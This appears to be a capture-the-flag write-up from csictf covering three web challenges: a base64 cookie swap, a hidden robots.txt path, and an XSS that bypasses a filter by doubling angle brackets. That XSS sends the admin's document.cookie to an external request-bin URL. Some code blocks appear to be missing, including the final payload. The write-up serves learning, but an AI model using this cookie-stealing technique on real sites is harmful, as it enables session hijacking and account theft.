My nephew is a fussy eater and is only willing to eat chocolate oreo. Any other flavour and he throws a tantrum.
Nice and simple web challenge.
Looking at the webpage's cookie, it appears to be base64 encoded.
Encode the word "chocolate" in base64, then replace the current base64 value in the cookie. The only thing to note is to make sure the base64 is also URL encoded.
"People who get violent get that way because they can’t communicate."
Navigating to /robots.txt, we see:
Navigating to /fade/to/black, we get the flag.
Flag: csictf{br0b0t_1s_pr3tty_c00l_1_th1nk}
Looking at the source, you can see that the admin makes a request to http://chall.csivit.com:30256/view to view your colour. You can then specify a URL and a colour for the admin to use.
I set up a request bin at https://ennfyqj04serj.x.pipedream.net so that I could easily monitor requests made to that URL. But setting the URL that the admin visits to anything outside of http://chall.csivit.com:30256/view seemed to throw an error. However, I can set the colour to anything I like.
Looking at the source of http://chall.csivit.com:30256/, it is clear that the only form of sanitising is that "<" and ">" are replaced with "". This means that later on I could use ">>" in place of ">" and "<<" in place of "<".
The final exploit looked like the following:
Everything up to and including the first semicolon is used to escape the tags and quotes that the URL sits in. The admin's cookie is then sent to https://ennfyqj04serj.x.pipedream.net/?c="+document.cookie, and that cookie is your flag.